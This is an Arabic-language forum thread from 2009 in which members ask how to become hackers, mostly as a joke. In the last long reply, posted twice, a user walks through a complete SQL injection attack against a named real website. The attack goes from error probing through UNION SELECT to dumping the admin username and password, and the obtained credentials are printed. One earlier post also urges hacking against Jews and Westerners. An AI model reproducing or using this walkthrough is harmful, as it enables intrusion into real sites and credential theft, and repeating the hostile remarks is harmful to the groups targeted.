دخول
المتواجدون الآن ؟
ككل هناك 46 عُضو متصل حالياً :: 0 عضو مُسجل, 0 عُضو مُختفي و 46 زائر لا أحد
أكبر عدد للأعضاء المتواجدين في هذا المنتدى في نفس الوقت كان 462 بتاريخ الثلاثاء 4 يونيو 2013 - 14:24
أريد ان أصبح قرصانا ؟؟؟؟؟
+11
Amine HB
bilal-df
mak84
DARINE
M.bilal92
mokaba_dz
بلال15
هناء
aminegeo
صالح ب
الزرماني
15 مشترك
صفحة 1 من اصل 1
أريد ان أصبح قرصانا ؟؟؟؟؟
من طرف الزرماني الأربعاء 13 مايو 2009 - 19:36
أهلا أيها الرفاقطالما سمعت هذا الاسم القراصنة او الهاكرز ، و لكن لا أعلم من هم و كيف يعملون ، و هل بإمكاني أن أصبح مثلهم ؟إذا كان لديكم برنامج تدريب على فن القرصنة فإني و الله متشوق له كثيرا ، سأعترض جميع البواخرالغربية ، و سأستيح جميع المواقع الصهيونية ، و أعلنها شعواء عليهم .... لا تتعجبوا فإن في دمائي شيء من أجدادي العثمانيين الذين سادوا البحار لسنوات عديدة ، فلا غرابة ، و إن كانوا ليسوا قراصنة ، بل الغرب هو الذي وصفهم بذلك لأنه كان يرهبهمبابا عروج و خير الدين و الرايس حميدو و كل أمراء البحر، لعلمكم كلمة الأميرال و هي كلمة أجنبية هي عربية تعني أمير البحر ، و هذا دليل على ان الاجداد كانوا بالفعل أسيادا،
عدل سابقا من قبل الزرماني في الأربعاء 13 مايو 2009 - 20:18 عدل 3 مرات
الزرماني- :: عضو شرفي ::
- تاريخ التسجيل : 12/04/2009
عدد الرسائل : 823
الجنس :
رد: أريد ان أصبح قرصانا ؟؟؟؟؟
من طرف صالح ب الأربعاء 13 مايو 2009 - 19:50
لولا اني قرأت اسم صاحب الموضوع لكنت قد حذفت الموضوع مباشرة
هههههههه
لكنه الزرماني
واضم صوتي لصوتك
نفس الطلب
وبدون تعليق
اقول لك يا رييييييييييييييييييييييييييت
لنعيد ولو بعض المجد لأيام خلت كنا فيها اسياد العالم
هههههههه
لكنه الزرماني
واضم صوتي لصوتك
نفس الطلب
وبدون تعليق
اقول لك يا رييييييييييييييييييييييييييت
لنعيد ولو بعض المجد لأيام خلت كنا فيها اسياد العالم
صالح ب- :: عضو شرفي ::
- تاريخ التسجيل : 09/02/2009
عدد الرسائل : 1741
الجنس :
رد: أريد ان أصبح قرصانا ؟؟؟؟؟
من طرف aminegeo الأربعاء 13 مايو 2009 - 20:16
ليست لدي ادنى فكرة عن الهاكرز
بالتوفيق أخي
بالتوفيق أخي
aminegeo- :: عضو شرفي ::
- تاريخ التسجيل : 01/06/2008
عدد الرسائل : 2340
الجنس :
Algérie
مراقب سابق
رد: أريد ان أصبح قرصانا ؟؟؟؟؟
من طرف هناء الأربعاء 13 مايو 2009 - 20:30
أنا أيضا أريد أن أصبح قرصانة و قد بدأت في تعلم أساسيات القرصنة
لدي بعض البرامج للقرصنة في الجهاز لكن لا أعرف استعمالها
و كما نعرف فإن عالم القرصنة عالم متشعب و شائك يصعب الخوض فيه
و لدي نفس طلب الأخ الزرماني
من له خبرة في القرصنة؟؟؟
لدي بعض البرامج للقرصنة في الجهاز لكن لا أعرف استعمالها
و كما نعرف فإن عالم القرصنة عالم متشعب و شائك يصعب الخوض فيه
و لدي نفس طلب الأخ الزرماني
من له خبرة في القرصنة؟؟؟
هناء- :: عضو شرفي ::
- تاريخ التسجيل : 17/09/2008
عدد الرسائل : 1527
الجنس :
رد: أريد ان أصبح قرصانا ؟؟؟؟؟
من طرف الزرماني الأربعاء 13 مايو 2009 - 20:36
كلنا في نفسه حب القرصنة ؟ ألسنا أبناء آبنائنا . لا نريد adnلتحليل دمائنا فنحن نشترك في ما فعل الأجداد ، و ليس الرجال فحسب حتى النساء . شكرا لمروركم. و أكيد سنتعلم يا هناء هذا الفن. ن فمن تعلمه أمن شره.أين تقنيو المنتدى ؟هناء كتب:أنا أيضا أريد أن أصبح قرصانة و قد بدأت في تعلم أساسيات القرصنة
لدي بعض البرامج للقرصنة في الجهاز لكن لا أعرف استعمالها
و كما نعرف فإن عالم القرصنة عالم متشعب و شائك يصعب الخوض فيه
و لدي نفس طلب الأخ الزرماني
من له خبرة في القرصنة؟؟؟
الزرماني- :: عضو شرفي ::
- تاريخ التسجيل : 12/04/2009
عدد الرسائل : 823
الجنس :
رد: أريد ان أصبح قرصانا ؟؟؟؟؟
من طرف بلال15 الأربعاء 13 مايو 2009 - 20:40
القرصنة والهاكر كبيرة عليكم بلعقل برك لي يحب يتعلم جي عندي ب 5000000 دج للساعة
بلال15- عضو بارز
- تاريخ التسجيل : 30/03/2009
عدد الرسائل : 708
الجنس :
العمر : 29 -
رد: أريد ان أصبح قرصانا ؟؟؟؟؟
من طرف mokaba_dz الأربعاء 13 مايو 2009 - 20:41
حمزة بلال كتب:القرصنة والهاكر كبيرة عليكم بلعقل برك لي يحب يتعلم جي عندي ب 5000000 دج للساعة
اوووووووووووووووووووووووووو يا صاحبي هادي اي بزاف علينا بلعقل برك
mokaba_dz- عضو متميز
- تاريخ التسجيل : 30/06/2008
عدد الرسائل : 1017
الجنس :
رد: أريد ان أصبح قرصانا ؟؟؟؟؟
من طرف الزرماني الأربعاء 13 مايو 2009 - 20:48
شكرا لك حمزة على التواصل . انا مستعد ان أدفع هذا المبلغ....بشرط ان نعترض ناقلة بترول ، صدقنى سأرضى بربع الربع من الغنيمةفهل توافق ؟؟حمزة بلال كتب:القرصنة والهاكر كبيرة عليكم بلعقل برك لي يحب يتعلم جي عندي ب 5000000 دج للساعة
الزرماني- :: عضو شرفي ::
- تاريخ التسجيل : 12/04/2009
عدد الرسائل : 823
الجنس :
رد: أريد ان أصبح قرصانا ؟؟؟؟؟
من طرف هناء الأربعاء 13 مايو 2009 - 20:50
بالعقل علينا يا بلال او بزاف هذا المبلغالقرصنة والهاكر كبيرة عليكم بلعقل برك لي يحب يتعلم جي عندي ب 5000000 دج للساعة
فتعلم القرصنة لا يحتاج كل هذا
بما انك قلت أن القرصنة كبيرة علينا هذا يعني انك قرصان محترف
طيب اعطينا اسم اشهر هاكر في العالم ؟؟
و اشهر برنامج للقرصنة ؟؟
ماهي الثغرات ؟؟
ماهو الip ؟؟
هناء- :: عضو شرفي ::
- تاريخ التسجيل : 17/09/2008
عدد الرسائل : 1527
الجنس :
رد: أريد ان أصبح قرصانا ؟؟؟؟؟
من طرف M.bilal92 الأربعاء 13 مايو 2009 - 20:59
هذا علم غزير
صعيب
كون جاء ساهل كون راني قرصان
مادا بيا نتعلم
صعيب
كون جاء ساهل كون راني قرصان
مادا بيا نتعلم
M.bilal92- :: عضو شرفي ::
- تاريخ التسجيل : 01/10/2008
عدد الرسائل : 5316
الجنس :
العمر : 32
رد: أريد ان أصبح قرصانا ؟؟؟؟؟
من طرف الزرماني الأربعاء 13 مايو 2009 - 21:07
أهلا بك بلال اعزم و تعالى لنتعلم هذا الصيف فن الهكرزة ، و ربما قد نستفيد.لأني سمعت أنه بستطاعة الهاكر ان يحتكر المنتدى لمدة معينة ،أو ان يفعل به ما يشاء ، و في هذه الحالة ، قد نصاب بإحباط شديد. الأمر خطير أين تقنيو المنتدى ؟؟؟M.bilal92 كتب:هذا علم غزير
صعيب
كون جاء ساهل كون راني قرصان
مادا بيا نتعلم
الزرماني- :: عضو شرفي ::
- تاريخ التسجيل : 12/04/2009
عدد الرسائل : 823
الجنس :
رد: أريد ان أصبح قرصانا ؟؟؟؟؟
من طرف هناء الأربعاء 13 مايو 2009 - 21:15
أين تقنيو المنتدى ؟؟؟
يبدو ان تقنيي المنتدى غائبون اليوم
هناء- :: عضو شرفي ::
- تاريخ التسجيل : 17/09/2008
عدد الرسائل : 1527
الجنس :
رد: أريد ان أصبح قرصانا ؟؟؟؟؟
من طرف DARINE الأربعاء 13 مايو 2009 - 21:27
اريد ان اعيش كما انا
لماذا القرصنة وانا في غنى عنها
لماذا القرصنة وانا في غنى عنها
DARINE- :: عضو شرفي ::
- تاريخ التسجيل : 13/01/2009
عدد الرسائل : 1980
الجنس :
مشرفة سابقة بقسم المرأة
العمر : 30
رد: أريد ان أصبح قرصانا ؟؟؟؟؟
من طرف صالح ب الأربعاء 13 مايو 2009 - 22:21
يا جماعة القرصنة الهاكرز لي بعض الخبرة بها
وكنت أضن ان الآخ الزرماني يقصد هدف أسمى مما يناقش بين الإخوة
على كل لا مشكلة هناك برامج عديدة وهناك فنيات وتقنيات أكثر
لكن مالهدف من القرصنة اعطني هدفا نبيلا وتعالى اخبرك بخفايا الهاكرز والبرامج المستعملة لديهم
ويبقى ان اشير
لو دخلت هذا العالم فبشروط
اولها تأكد انك بمجرد دخول هذا العالم انك اول فريسة ستقع بين ايدي الهاكرز
ثانيا ستعرض نفسك وجهازك للدمار تأكد من ذلك
قبل ان تكون فارسا بهذا المجال لا بد من كبوات عدة لكن هاته الكبوات من الممكن ان تكلفك الكثير
ولي موضوع بالمنتدى بعنوان حقيقة الهاكرز طالعوه وردوا علي
وقد كنا قديما لما نقصد مقاهي النت كنا نقول لصاحب المقهى سندخل النت لكن ارجوك من دون أرنب او صاحب النظارات
هههههههههههه
وهي برامج كان يستعملها صاحب المقهى للتجسس على الزوار
كما اظيف نصيحة لبعض الإخوة مثلا لما تدخل سيبار وبعد ان تقوم اجلس انا مكانك و بطريقة ما اعرف كل صغيرة وكبيرة عما كنت تفعله حرفيا من دون برامج
فأرجو ان تنتبهوا لخصوصياتكم
هههههههههههههههههههههههههههههههههههههه
وكنت أضن ان الآخ الزرماني يقصد هدف أسمى مما يناقش بين الإخوة
على كل لا مشكلة هناك برامج عديدة وهناك فنيات وتقنيات أكثر
لكن مالهدف من القرصنة اعطني هدفا نبيلا وتعالى اخبرك بخفايا الهاكرز والبرامج المستعملة لديهم
ويبقى ان اشير
لو دخلت هذا العالم فبشروط
اولها تأكد انك بمجرد دخول هذا العالم انك اول فريسة ستقع بين ايدي الهاكرز
ثانيا ستعرض نفسك وجهازك للدمار تأكد من ذلك
قبل ان تكون فارسا بهذا المجال لا بد من كبوات عدة لكن هاته الكبوات من الممكن ان تكلفك الكثير
ولي موضوع بالمنتدى بعنوان حقيقة الهاكرز طالعوه وردوا علي
وقد كنا قديما لما نقصد مقاهي النت كنا نقول لصاحب المقهى سندخل النت لكن ارجوك من دون أرنب او صاحب النظارات
هههههههههههه
وهي برامج كان يستعملها صاحب المقهى للتجسس على الزوار
كما اظيف نصيحة لبعض الإخوة مثلا لما تدخل سيبار وبعد ان تقوم اجلس انا مكانك و بطريقة ما اعرف كل صغيرة وكبيرة عما كنت تفعله حرفيا من دون برامج
فأرجو ان تنتبهوا لخصوصياتكم
هههههههههههههههههههههههههههههههههههههه
صالح ب- :: عضو شرفي ::
- تاريخ التسجيل : 09/02/2009
عدد الرسائل : 1741
الجنس :
رد: أريد ان أصبح قرصانا ؟؟؟؟؟
من طرف mak84 الأحد 24 مايو 2009 - 15:53
اخوتي ان عالم الهاكر هو عالم كبير ومتشعب كما قال الاخ صالح ب
تأكد انك بمجرد دخول هذا العالم انك اول فريسة ستقع بين ايدي الهاكرز
وازيدكم علما ان عالم الهاكرز ينقسم الى :
قسم اختراق الاجهزة
قسم اختراق المنتديات والمواقع
قسم اختراق الايمايلات بمختلف انواعها
قسم ااختراق السرفورات .......الخ
ارجو لمنت ان يتعلم الهاكر ان تكون في خدمة الاسلام والسلمين ضد اليهود والغربيين الانذال
تأكد انك بمجرد دخول هذا العالم انك اول فريسة ستقع بين ايدي الهاكرز
وازيدكم علما ان عالم الهاكرز ينقسم الى :
قسم اختراق الاجهزة
قسم اختراق المنتديات والمواقع
قسم اختراق الايمايلات بمختلف انواعها
قسم ااختراق السرفورات .......الخ
ارجو لمنت ان يتعلم الهاكر ان تكون في خدمة الاسلام والسلمين ضد اليهود والغربيين الانذال
mak84- عضو
- تاريخ التسجيل : 19/11/2008
عدد الرسائل : 14
رد: أريد ان أصبح قرصانا ؟؟؟؟؟
من طرف صالح ب الأحد 24 مايو 2009 - 21:23
بارك اله فيك إظافات منطقية ونصائح في القمةmak84 كتب:اخوتي ان عالم الهاكر هو عالم كبير ومتشعب كما قال الاخ صالح ب
تأكد انك بمجرد دخول هذا العالم انك اول فريسة ستقع بين ايدي الهاكرز
وازيدكم علما ان عالم الهاكرز ينقسم الى :
قسم اختراق الاجهزة
قسم اختراق المنتديات والمواقع
قسم اختراق الايمايلات بمختلف انواعها
قسم ااختراق السرفورات .......الخ
ارجو لمنت ان يتعلم الهاكر ان تكون في خدمة الاسلام والسلمين ضد اليهود والغربيين الانذال
كل اشكر لك
صالح ب- :: عضو شرفي ::
- تاريخ التسجيل : 09/02/2009
عدد الرسائل : 1741
الجنس :
bilal-df- :: عضو شرفي ::
- تاريخ التسجيل : 27/03/2009
عدد الرسائل : 903
الجنس :
العمر : 32
رد: أريد ان أصبح قرصانا ؟؟؟؟؟
من طرف Amine HB الخميس 28 مايو 2009 - 2:08
ممكن أن تصبح قرصانا عظيما لكن الامر صعب جدا
سؤوافيك بكتاب عن القرصنة
Amine HB- :: عضو شرفي ::
- تاريخ التسجيل : 04/03/2009
عدد الرسائل : 2178
الجنس :
العمر : 32
bilal-df- :: عضو شرفي ::
- تاريخ التسجيل : 27/03/2009
عدد الرسائل : 903
الجنس :
العمر : 32
رد: أريد ان أصبح قرصانا ؟؟؟؟؟
من طرف oussama_20aout السبت 6 يونيو 2009 - 14:22
koursan yasskan f soumame sekssih gouli kifah wlit kourssan
oussama_20aout- عضو
- تاريخ التسجيل : 20/03/2009
عدد الرسائل : 20
رد: أريد ان أصبح قرصانا ؟؟؟؟؟
من طرف harcha السبت 6 يونيو 2009 - 14:39
شكون ياسين تاع بن عسكر ههههههههههههههههoussama_20aout كتب:koursan yasskan f soumame sekssih gouli kifah wlit kourssan
القرصان
**********
والله انا تاني حاب نعرف عن هذا العالم القائم بذاته وكيف اصبح قرصانا
harcha- :: عضو شرفي ::
- تاريخ التسجيل : 23/05/2008
عدد الرسائل : 1447
الجنس : مدغشقر -
رد: أريد ان أصبح قرصانا ؟؟؟؟؟
من طرف SIRINNE السبت 6 يونيو 2009 - 15:49
لماذا القرصنة ؟؟؟؟؟؟؟؟؟؟؟؟؟؟
SIRINNE- عضو فعال
- تاريخ التسجيل : 30/05/2009
عدد الرسائل : 471
الجنس :
رد: أريد ان أصبح قرصانا ؟؟؟؟؟
من طرف hard_way1990 الأحد 14 يونيو 2009 - 21:24
القرصنة أخي من أصعب مجالات الكمبيوتر ...
وسأعطيك الطريق الصحيح لتتعلمها ..
أولا عليك أن تدرس جميع لغات البرمجة ... أسمبلي . سي . سي++ . جافا . ليسب. برولوغ . بايثون . سي شارب. فورتران . روبي. أدا . دلفي . بيسك. كوبول . باسكال . إس كيو إل . بي إتش بي . آش تي آم آل . جافا سكربت ..
سأعطيك أبسط مثال أخي ..
مثلا أنت درست لغة ال إس كيو أل ألي هي بالطبع باللغة الإنجليزية sql لو يكون عندك موقع مبرمج ب لغة ال أس كيو أل مثل ..
هذا http://cartoons.sev.com.au/index.php?catid=4
نفتح الموقع نجده عادي ..
لو نضيف علامة ' في نهاية المتصفح أي هكذا http://cartoons.sev.com.au/index.php?catid=4'
نضع هاته العلامة ' بعد الرقم 4
ونضغط على أوكي بالطبع سننتقل إلى نفصض الصفحة لاكن لاحظ جيدا ستجدها بها هاته الكتابة
Database error: Invalid SQL: SELECT * FROM Categories WHERE catid = 4\'
MySQL Error: 1064 (You have an error in your SQL syntax; check
the manual that corresponds to your MySQL server version for the right
syntax to use near '\'' at line 1)
Session halted.
التي تدل على أنه يوجد خطأ وهاذه ثغرة إسمها SQL Injection
لأن لغة ال sql أيضا متشعبة
الآن لدينا خطأ لاكن كيف سنستغله ؟؟؟
سأعطيك فكرة صغيرة عن مبدأ عمل لغة ال sql
ال أس كيو أل جاية من كلمة Structured Query Language
وهي تعتمد على قاعدة بيانات هاته القاعدة بها أعمدة
وإذا ظهر لك الخطأ الذي ظهر لنا الفوق يعني أنو لدينا عمود مصاب
كيف سنعرف أين هو العمود المصاب ؟؟؟
نضع هاته الكتابة في المتصفح id=-4
ونضيف أيضا معها +order+by+
ليصبح لدينا ما يلي
http://cartoons.sev.com.au/index.php?catid=-4+order+by+
الأخطاء دائما ما تكون في الأعمدة ما بين 1 و 100
يعني سنستعمل ما يلي
+order+by+100
ويصبح لدينا
http://cartoons.sev.com.au/index.php?catid=-4+order+by+100
ونضغط على أوكي ..
إذا بقى الخطأ ألي ظهر لنا من فوق يظهر يعني أننا لم نجد العمود المصاب
أعني هذا الخطأ :
Database error: Invalid SQL: SELECT * FROM Categories WHERE catid = -4 order by 100
MySQL Error: 1054 (Unknown column '100' in 'order clause')
Session halted.
ننقص شوية في عدد الأعمدة مثلا نستعمل 90 آو 80 آو 70 إلا أن يختفي الخطأ إذا إختفى الخطأ مبروك عليك وجدت العمود المصاب
وأنا وجدته في العمود 10
http://cartoons.sev.com.au/index.php?catid=-4+order+by+10
يعني الخطأ ما بين 1 و 10
نستعلم عن العمود المصاب بالضبط عن طريق
+union+select+
ونضع الأرقام من واحد إلا 10
كيما حطيتها أنا من تحت
http://cartoons.sev.com.au/index.php?catid=-4+union+select+1,2,3,4,5,6,7,8,9,10
ونضغط أوكي راح يعطينا الرقم 4
أي هو العمود المصاب ..
الآن يجب أن نستعلم عن إصدار قاعدة البينات لأنو كل إصدار وطريقة التعامل معه بالطبع نستعمل
version()
نحذف الرقم 4 أي رقم العمود المصاب ونضع مكانه version()
بعد وضعه http://cartoons.sev.com.au/index.php?catid=-4+union+select+1,2,3,version(),5,6,7,8,9,10
ينتج لنا أن إصدار قاعدة البينات هو
4.1.22-standard-log
أي الإصدار الرابع لأنو كاين الإصدار رقم 4 والإصدار رقم 5
وللإستعلام عن إسم قاعدة البينات نستعمل database()
http://cartoons.sev.com.au/index.php?catid=-4+union+select+1,2,3,database(),5,6,7,8,9,10
وينتج لنا أن إسم القاعدة هو sevco_db
الآن نستعلم عن admin user
أي اليوز الخاص بالمدير
وأيضا عن الباسورد ألي راه يستعملو عن طريق concat_ws(0x3a3a3a,username,password)
وأيضا نضيف +from+user في آخر كتابتنا
أي هكذا
http://cartoons.sev.com.au/index.php?catid=-4+union+select+1,2,3,concat_ws(0x3a3a3a,username,password),5,6,7,8,9,10+from+user
مبروك علينا إستخرجنا اليوزر والباس
johncook: اليوزر
cobber :الباس
هههههه في رأيك أخي هل تم إختراق الموقع ؟؟؟ ههه
لا لأننا لازم نلقاو المسار تاع لوحة التحكم تاع الإدارة باه نستطيعو تسجيل الدخول وإختراق الموقع ...
والمسار مخفي عن الأنظار ..
صاحب الموقع يخفي المسار حتى إذا تستطيع إختراق موقعه وإستخراج الباس واليوزر لن تجد ماكانا لتستخدمها ههه
توجد برامج للبحث عن مسار لوحة التحكم مي والله لم أجدها خطرة خلاف إن شاء ..
عموما أخي أنا شرحتلك طريقة إختراق المواقع المبرمجة بال sql
وكل موقع و برمجته وكل موقع وطرق غختراقه وهي عديييييييييدة لازملك وقت كبير ودوام في الإجتهاد باه تقدر تولي قرصان أخي ...
تقبل تحياتي خويا
سلام
وسأعطيك الطريق الصحيح لتتعلمها ..
أولا عليك أن تدرس جميع لغات البرمجة ... أسمبلي . سي . سي++ . جافا . ليسب. برولوغ . بايثون . سي شارب. فورتران . روبي. أدا . دلفي . بيسك. كوبول . باسكال . إس كيو إل . بي إتش بي . آش تي آم آل . جافا سكربت ..
سأعطيك أبسط مثال أخي ..
مثلا أنت درست لغة ال إس كيو أل ألي هي بالطبع باللغة الإنجليزية sql لو يكون عندك موقع مبرمج ب لغة ال أس كيو أل مثل ..
هذا http://cartoons.sev.com.au/index.php?catid=4
نفتح الموقع نجده عادي ..
لو نضيف علامة ' في نهاية المتصفح أي هكذا http://cartoons.sev.com.au/index.php?catid=4'
نضع هاته العلامة ' بعد الرقم 4
ونضغط على أوكي بالطبع سننتقل إلى نفصض الصفحة لاكن لاحظ جيدا ستجدها بها هاته الكتابة
Database error: Invalid SQL: SELECT * FROM Categories WHERE catid = 4\'
MySQL Error: 1064 (You have an error in your SQL syntax; check
the manual that corresponds to your MySQL server version for the right
syntax to use near '\'' at line 1)
Session halted.
التي تدل على أنه يوجد خطأ وهاذه ثغرة إسمها SQL Injection
لأن لغة ال sql أيضا متشعبة
الآن لدينا خطأ لاكن كيف سنستغله ؟؟؟
سأعطيك فكرة صغيرة عن مبدأ عمل لغة ال sql
ال أس كيو أل جاية من كلمة Structured Query Language
وهي تعتمد على قاعدة بيانات هاته القاعدة بها أعمدة
وإذا ظهر لك الخطأ الذي ظهر لنا الفوق يعني أنو لدينا عمود مصاب
كيف سنعرف أين هو العمود المصاب ؟؟؟
نضع هاته الكتابة في المتصفح id=-4
ونضيف أيضا معها +order+by+
ليصبح لدينا ما يلي
http://cartoons.sev.com.au/index.php?catid=-4+order+by+
الأخطاء دائما ما تكون في الأعمدة ما بين 1 و 100
يعني سنستعمل ما يلي
+order+by+100
ويصبح لدينا
http://cartoons.sev.com.au/index.php?catid=-4+order+by+100
ونضغط على أوكي ..
إذا بقى الخطأ ألي ظهر لنا من فوق يظهر يعني أننا لم نجد العمود المصاب
أعني هذا الخطأ :
Database error: Invalid SQL: SELECT * FROM Categories WHERE catid = -4 order by 100
MySQL Error: 1054 (Unknown column '100' in 'order clause')
Session halted.
ننقص شوية في عدد الأعمدة مثلا نستعمل 90 آو 80 آو 70 إلا أن يختفي الخطأ إذا إختفى الخطأ مبروك عليك وجدت العمود المصاب
وأنا وجدته في العمود 10
http://cartoons.sev.com.au/index.php?catid=-4+order+by+10
يعني الخطأ ما بين 1 و 10
نستعلم عن العمود المصاب بالضبط عن طريق
+union+select+
ونضع الأرقام من واحد إلا 10
كيما حطيتها أنا من تحت
http://cartoons.sev.com.au/index.php?catid=-4+union+select+1,2,3,4,5,6,7,8,9,10
ونضغط أوكي راح يعطينا الرقم 4
أي هو العمود المصاب ..
الآن يجب أن نستعلم عن إصدار قاعدة البينات لأنو كل إصدار وطريقة التعامل معه بالطبع نستعمل
version()
نحذف الرقم 4 أي رقم العمود المصاب ونضع مكانه version()
بعد وضعه http://cartoons.sev.com.au/index.php?catid=-4+union+select+1,2,3,version(),5,6,7,8,9,10
ينتج لنا أن إصدار قاعدة البينات هو
4.1.22-standard-log
أي الإصدار الرابع لأنو كاين الإصدار رقم 4 والإصدار رقم 5
وللإستعلام عن إسم قاعدة البينات نستعمل database()
http://cartoons.sev.com.au/index.php?catid=-4+union+select+1,2,3,database(),5,6,7,8,9,10
وينتج لنا أن إسم القاعدة هو sevco_db
الآن نستعلم عن admin user
أي اليوز الخاص بالمدير
وأيضا عن الباسورد ألي راه يستعملو عن طريق concat_ws(0x3a3a3a,username,password)
وأيضا نضيف +from+user في آخر كتابتنا
أي هكذا
http://cartoons.sev.com.au/index.php?catid=-4+union+select+1,2,3,concat_ws(0x3a3a3a,username,password),5,6,7,8,9,10+from+user
مبروك علينا إستخرجنا اليوزر والباس
johncook: اليوزر
cobber :الباس
هههههه في رأيك أخي هل تم إختراق الموقع ؟؟؟ ههه
لا لأننا لازم نلقاو المسار تاع لوحة التحكم تاع الإدارة باه نستطيعو تسجيل الدخول وإختراق الموقع ...
والمسار مخفي عن الأنظار ..
صاحب الموقع يخفي المسار حتى إذا تستطيع إختراق موقعه وإستخراج الباس واليوزر لن تجد ماكانا لتستخدمها ههه
توجد برامج للبحث عن مسار لوحة التحكم مي والله لم أجدها خطرة خلاف إن شاء ..
عموما أخي أنا شرحتلك طريقة إختراق المواقع المبرمجة بال sql
وكل موقع و برمجته وكل موقع وطرق غختراقه وهي عديييييييييدة لازملك وقت كبير ودوام في الإجتهاد باه تقدر تولي قرصان أخي ...
تقبل تحياتي خويا
سلام
hard_way1990- عضو نشيط
- تاريخ التسجيل : 20/04/2009
عدد الرسائل : 115
الجنس :
العمر : 33
صفحة 1 من اصل 1
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى